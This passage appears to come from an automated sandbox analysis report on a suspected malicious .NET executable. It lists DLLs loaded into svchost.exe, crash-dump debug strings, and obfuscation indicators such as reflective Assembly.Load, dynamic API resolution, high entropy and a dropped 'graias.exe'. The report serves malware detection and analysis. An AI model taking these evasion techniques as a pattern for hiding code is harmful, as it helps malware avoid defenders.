                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: 4XYAW8PbZH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 4XYAW8PbZH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Xml.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbxX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdbX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbAccessibility.dllD source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb4 source: WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdbMZ source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdbl source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdbP source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr

                Data Obfuscation

                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs .Net Code: Wpate7UGii System.Reflection.Assembly.Load(byte[])
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.cs .Net Code: Wpate7UGii System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 0_2_054D42D7 push ebx; ret 0_2_054D42DA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 3_2_00434006 push ecx; ret 3_2_00434019
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 3_2_004567F0 push eax; ret 3_2_0045680E
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 3_2_0045B9DD push esi; ret 3_2_0045B9E6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Code function: 3_2_00455EBF push ecx; ret 3_2_00455ED2
                Source: 4XYAW8PbZH.exe Static PE information: section name: .text entropy: 7.905744938169938
                Source: graias.exe.3.dr Static PE information: section name: .text entropy: 7.905744938169938
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, VVDsp5z0h3ueCBhMHI.cs High entropy of concatenated method names: 'uIn7A4c5c4', 'cKd7sP29J8', 'PVJ7OPUjgm', 'GOt7RTbFRX', 'fRq7nLo8jY', 'DsO7yXYm8F', 'jfG7KvFoCV', 'Myv7ryJQZt', 'Xsw76AFOO9', 'Kyv7jAnZ5D'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs High entropy of concatenated method names: 'QoAogqc15s', 'e0foZWP9NT', 'rvLoE54nKf', 'xm2oHsaGlJ', 'UWSowSuwci', 'sO3o34FuNi', 'rGjouvpEx0', 'fYlobbE8aU', 'P16oDiReVp', 'WGloPIyo49'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, xIqYjAki73C3cKXD85.cs High entropy of concatenated method names: 'mbH7H07iFW', 'cqN7w994hK', 'ar073Ob3xB', 'wGn7uSWQE6', 'Bt87fiZN8f', 'wJO7bL4K0j', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, r9CwgrmCq0iA7y8nJ9.cs High entropy of concatenated method names: 'kmo10oA3WG', 'XF91kVnfgY', 'uD4JF8j06V', 'pS0JBFMV7N', 'IBk18L56x4', 'mwX15QL4Zw', 'FQX1MFhCAe', 'M7E14W3NRJ', 'otb1VZdwoy', 'kBj1GN1mkX'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, RIk7WQRjI599urvrYU.cs High entropy of concatenated method names: 'fdr3ga9YYx', 'V2R3EC5bMN', 'HeQ3wmZs3A', 'F8g3uE54eo', 'axd3bC7mZl', 'bhQw2fCU0I', 'AtGwmfhcBv', 'Q91wXBbP8W', 'lZDw0CQDUh', 'XS5wvI0nGD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, YyrH5xHV915ThCRfGa.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xOLWv2TDtE', 'y8rWkqnK6l', 'QGkWzCEIkm', 'Ro9oF4Ba7N', 'gbNoBhb6tG', 'xbcoWtMcYZ', 'OAiooghZRU', 'nE4ApMOscsGI89RvYjD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, XZYmxvaX0mNFxC84I7.cs High entropy of concatenated method names: 'BCOu6animg', 'qDIujWCwOM', 'QxtueC8Dn5', 'LywuUPvaA5', 'UcluqdNTZc', 'q2RuAlnaak', 'qMhuihgE1v', 'pkkusiJKe3', 'ab7uOBwqco', 'pX1uxKqnWF'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, S7guEaWiHrCoe6iT91.cs High entropy of concatenated method names: 'WXqeUm90M', 'jLwUZjEem', 'FrnA6jFId', 'WScicf8OE', 'v2dO8kdkD', 'INkxIPV9m', 'tcUSWTHvQbeageBmqd', 'l1LITJQyVHatQptoum', 'dIlJm2d5V', 'v0j73y1qS'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, YMJvB8OTLB6H3cybAH.cs High entropy of concatenated method names: 'Y0hHUedI8O', 'DuGHAgvPnO', 'a8rHsj6twY', 'FJnHOgNW5o', 'aOFHdNM4AY', 'dKLHInGRiR', 'BskH1vZj2A', 'NonHJVcBa7', 'El9Hfp8FFn', 'S6MH7wg6FD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, gUDpoRBWcGZJdJ1xBgC.cs High entropy of concatenated method names: 'ToString', 'wVZcsWakXq', 'jadcOJnm38', 'gywcx1XbJp', 'o9dcRepSIn', 'Ud6cnPo0m9', 'V7LcCYiLhC', 'V3ccyPJWQZ', 'EWbZkW6svpOjxZ482uU', 'IjLn5e6Es8fcoPHGwnA'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, ivEyq7BBJ6wHAHZOqFG.cs High entropy of concatenated method names: 'EkX7kVEQfu', 'RCn7z45KMv', 'WcUcFO0E4b', 'G0bcBMMhvw', 'wuEcWPrMfa', 'iK2copKFXF', 'R0TctVlhJp', 'OmrcgXN0Xy', 'JlIcZTcJCr', 'HBfcEKWTaW'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, h2W2U5GjXycDmWoFtZ.cs High entropy of concatenated method names: 'ToString', 'lIpI8tcxTA', 'WZmInRvcb3', 'RgeIC7a36r', 'dlaIyl29RT', 'ogeIK2VhUH', 'VqFIQbFToc', 'dmeIlQabpw', 'j5RIp5t8Sg', 'lQOIaKea0i'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, aZ6hBXs8b9snu0Ud4p.cs High entropy of concatenated method names: 'Nm8E4IbjXI', 'EIqEV2l8ky', 'OxwEG3iQdT', 'Tf8EYDstEk', 'YG0E2Elp8q', 'VBtEmHKwxS', 'Bb5EX8pUrq', 'YTvE0rHEgl', 'bRAEvLQOc6', 'jkXEk9yqPO'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JqlCJGEi2WaZVqGLKM.cs High entropy of concatenated method names: 'Dispose', 'E11Bv6ly9v', 'w6nWnBkput', 'm0SpG3IOGJ', 'wFOBk7NNf2', 'iinBzceRpT', 'ProcessDialogKey', 'EcIWFODuZa', 'OOGWBdqpNj', 'gpjWW6IqYj'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, zTyVhKBtEs85eROFEAZ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UvPLf6tnDA', 'SjxL7gbcHA', 'Nh5LcscBeV', 'NwVLLFOxAi', 'AVGLTSkgw1', 'RpALSjCKBu', 'WbGLrFtVeZ'
